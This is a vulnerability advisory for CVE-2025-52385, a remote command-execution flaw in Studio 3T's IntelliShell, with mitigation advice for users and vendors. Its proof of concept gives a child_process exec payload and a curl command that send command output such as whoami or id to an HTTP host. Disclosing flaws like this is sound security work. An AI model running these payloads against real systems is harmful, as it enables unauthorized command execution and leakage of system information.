# CVE-2025-52385
**Software**: Studio 3T v.2025.1.0 

**Vulnerability Report**: Studio 3T Remote Command Execution

**Overview**
A critical vulnerability in Studio 3T version 2025.1.0 and earlier allows a remote attacker to execute arbitrary code via a crafted payload exploiting the child_process module in the IntelliShell component.

**Details**
**Vulnerability Type: Remote Command Execution**
Affected Product: Studio 3T, version <= 2025.1.0
Affected Component: IntelliShell
Attack Type: Remote
Impacts:
Code Execution: Yes
Denial of Service: Yes
Escalation of Privileges: Yes

**Description**
The vulnerability enables a remote attacker to execute arbitrary operating system commands by sending a malicious JavaScript payload through IntelliShell, leveraging the child_process module. This is a blind execution vulnerability, meaning no direct output is returned to the attacker.
Attack Vector

Establish a connection to a MongoDB instance.
Send a malicious JavaScript payload via IntelliShell that utilizes the child_process module to execute arbitrary operating system commands.

**Proof of Concept**
To verify the vulnerability, use the following steps:

Set up a local HTTP server:python3 -m http.server 80

Execute the following JavaScript payload in IntelliShell: const {exec} = require('child_process');
exec('curl 127.0.0.1/$(whoami)', (error, stdout, stderr) => console.log(stdout));


Alternatively, use the command below as a verification vector:curl http://site/$(id)
**References**

Studio 3T Official Website

Studio 3T GitHub Repository

CWE-78: OS Command Injection

CWE-94: Code Injection

**Mitigation**
Users: Upgrade to a patched version of Studio 3T (if available) or avoid using IntelliShell with untrusted MongoDB connections.
Vendors: Restrict or sanitize inputs to the child_process module in IntelliShell to prevent unauthorized command execution.

**Acknowledgments**
This vulnerability was discovered and reported by Kaio Mendonca Pereira.
